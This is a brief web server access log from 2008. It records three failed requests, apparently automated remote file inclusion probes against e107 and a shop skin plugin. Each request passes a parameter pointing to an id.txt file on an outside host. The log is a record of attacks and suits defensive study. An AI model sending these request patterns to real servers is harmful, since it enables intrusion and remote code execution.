83.64.132.254 - - [03/Oct/2008:00:56:26 -0400] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://shinhack.is-the-boss.com/id.txt? HTTP/1.1" 404 244 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
83.64.132.254 - - [03/Oct/2008:00:56:26 -0400] "GET //e107/e107_handlers/secure_img_render.php?p=http://shinhack.is-the-boss.com/id.txt? HTTP/1.1" 404 239 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
64.72.112.110 - - [03/Oct/2008:00:56:26 -0400] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.readingastro.org.uk//wap/in/id.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.800"
